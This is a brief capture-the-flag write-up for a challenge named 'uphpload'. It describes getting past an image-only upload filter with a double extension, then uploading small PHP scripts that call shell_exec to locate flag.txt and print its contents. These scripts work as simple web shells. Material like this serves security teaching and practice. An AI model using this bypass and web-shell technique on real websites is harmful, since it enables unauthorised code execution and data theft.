uphpload

Description

Chall desc

Solution

The webpage allows us to upload images and view them. This immediately suggests a file upload vulnerability.

index

The page only accepts image files. This can be bypassed using a double extension.

index

Upload a PHP script to search for flag.txt file:

<?php
    print shell_exec('find / -name "flag.txt"');
?>

Click on the file in uploads to run the script. This gives us the flag location.

index

Now upload a script to print the flag:

<?php
    print shell_exec('cat /flag_is_here/flag.txt');
?>

index